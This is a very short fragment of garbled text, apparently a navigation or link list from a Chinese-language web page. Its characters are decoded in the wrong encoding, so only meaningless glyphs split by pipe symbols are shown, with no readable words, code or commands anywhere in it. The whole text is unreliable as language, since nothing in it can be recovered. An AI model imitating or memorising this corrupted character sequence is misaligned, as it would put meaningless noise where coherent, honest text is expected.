վ֩ģ壺 | «Ϫ| | | | ǫ| Ͱ| ̨| ͻȪ| | | ұ| ״| | ϵ| ¬| ƽ| | | | | | ̩| ȷ| ̨| Ǹ| | | | ĵ| Զ| ƽ| ƽ| ˾| ̩| | Զ| | е| մ| ޻|